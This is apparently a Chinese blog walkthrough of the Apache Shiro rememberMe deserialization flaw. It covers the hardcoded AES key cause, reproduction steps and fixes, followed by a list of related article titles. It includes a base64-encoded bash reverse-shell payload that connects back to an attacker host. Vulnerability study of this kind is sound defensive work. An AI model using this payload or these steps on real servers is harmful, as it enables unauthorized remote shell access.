shiro反序列化漏洞的原理和复现
一、shiro简介
Shiro是一个强大的简单易用的Java安全框架,主要用来更便捷的认证,授权,加密,会话管理。Shiro首要的和最重要的目标就是容易使用并且容易理解。
二、shiro的身份认证工作流程
- 通过前端传入的值,
- 获取rememberMe cookie
- base64加密
- AES加密 (对称加解密)
- 反序列化
三、shiro反序列化漏洞原理
AES加密的密钥Key被硬编码在代码里,意味着每个人通过源代码都能拿到AES加密的密钥。因此,攻击者构造一个恶意的对象,并且对其序列化,AES加密,base64编码后,作为cookie的rememberMe字段发送。Shiro将rememberMe进行解密并且反序列化,最终造成反序列化漏洞
四、shiro漏洞复现
(1)开启环境,抓包判断是否是shiro框架
在cookie后边加上rememberMe=1,如果回复包出现rememberMe=deleteMe,说明他就是shiro框架
(2)获取key值,因为key值在源码中,所以需要使用工具获取
(3)爆破利用链
(4)执行反序列化漏洞命令执行
(5)利用shrio反弹shell
payload:bash -c {echo, YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4OC40NC4xNzAvODg4OCAwPiYx}|{base64,-d}|{bash,-i} //需要修改为vps的地址在进行base64加密
监听端口:
(5)使用另外一个工具进行爆破
由于工具失效了就不演示了
五、shiro反序列化漏洞的修复
- 删除代码里的默认密钥
- 默认配置里注释了默认密钥
- 升级shiro到1.2.5及以上
- 如果在配置里配置了密钥,那么请一定不要使用网上的密钥,一定不要!!
- 请自己base64一个AES的密钥,或者利用官方提供的方法生成密钥:org.apache.shiro.crypto.AbstractSymmetricCipherService#generateNewKey()
shiro反序列化漏洞的原理和复现相关推荐
- shiro反序列化漏洞学习(工具+原理+复现)
工具准备 1.java8 C:\Program Files\Java 2.冰蝎 C:\Users\ali\Desktop\tools\Behinder_v4.0.6 3.shiro反序列化 图形化工具 ...
- 【漏洞复现】Apache Shiro 反序列化漏洞
Apache Shiro 反序列化漏洞 一.简介 二.环境 三.漏洞原理 四.AES秘钥 1.判断AES秘钥 五.Shiro rememberMe反序列化漏洞(Shiro-550) 1.版本1.4.2 ...
- vulhub复现之shiro反序列化漏洞复现
目录 什么是shiro? 什么是安全框架? 反序列化与序列化 shiro反序列化漏洞 怎么判断是否存在反序列化漏洞? 什么是shiro? shiro是功能强大且容易使用的java安全框架.shiro可 ...
- Shiro反序列化漏洞利用笔记
Shiro反序列化漏洞利用笔记 Apache Shiro是一个强大且易用的Java安全框架,执行身份验证.授权.密码和会话管理.目前在Java web应用安全框架中,最热门的产品有Spring Sec ...
- 经典的Shiro反序列化漏洞分析
更多黑客技能 公众号:小道黑客 作者:掌控安全-holic 0x01.前言 相信大家总是面试会问到java反序列化,或者会问到标志性的漏洞,比如shiro反序列化,或者weblogic反序列化漏洞. ...
- Shiro反序列化漏洞利用详解(Shiro-550+Shiro-721)
Shiro反序列化漏洞利用详解(Shiro-550+Shiro-721) Shiro简介 Apache Shiro 是一个强大易用的Java安全框架,提供了认证.授权.加密和会话管理等功能,Shiro ...
- 4加密问题漏洞修复_Apache Shiro 反序列化漏洞实战
Apache Shiro是一个Java安全框架,执行身份验证.授权.密码和会话管理.2016年,网络中曝光1.2.4以前的版本存在反序列化漏洞.尽管该漏洞已经曝光几年,但是在实战中仍然比较实用.花了点 ...
- 实战渗透-Shiro反序列化漏洞实例
0x01.前言 这是一次授权的渗透测试,技术含量不高,但我始终相信,每一次的积累,都是为了成就更好的自己,所以过程简洁,记录下每个知识点.对渗透而言,我更喜欢实战的体验感,那种喜悦和知识的获取感,永远 ...
- shiro反序列化漏洞修复
文章目录 shiro反序列化漏洞修复 前言 解决方案 shiro反序列化漏洞修复 前言 最近项目在进行安全漏洞扫描的时候,出现一个shiro的反序列化漏洞的问题:目标IP站点存在Apache shir ...
最新文章
- WinAPI: SetRect 及初始化矩形的几种办法
- DateGridView的外观美化
- 元对象我所理解的设计模式(C++实现)——享元模式(Flyweight Pattern)
- hibernate-validate
- .NET Core实战项目之CMS 第十章 设计篇-系统开发框架设计
- 第2、3讲 图像的存储格式
- 从Java程序员进阶到架构师,6大核心技能要领详解
- SayMedia总览
- token 防止csrf
- mysql left join 右表数据不唯一的情况解决方法
- 新浪微博自动发送微博 功能已实现(net)
- mysql备份单实例(一)shell
- 一个非常好用的代理服务器软件AllegroSurf
- linux 系统安装微信小程序开发工具
- appium自动化测试
- 原始套接字Raw Socket基础-- WSADATA wsaData(转)
- Plugin工具类-Unreal4源码拆解-UnrealBuildTool功能流程解析
- 自律努力有目标的人生有多美
- 谈谈数据结构的重要性
- python十六进制转换成八进制_怎么把十六进制转化为八进制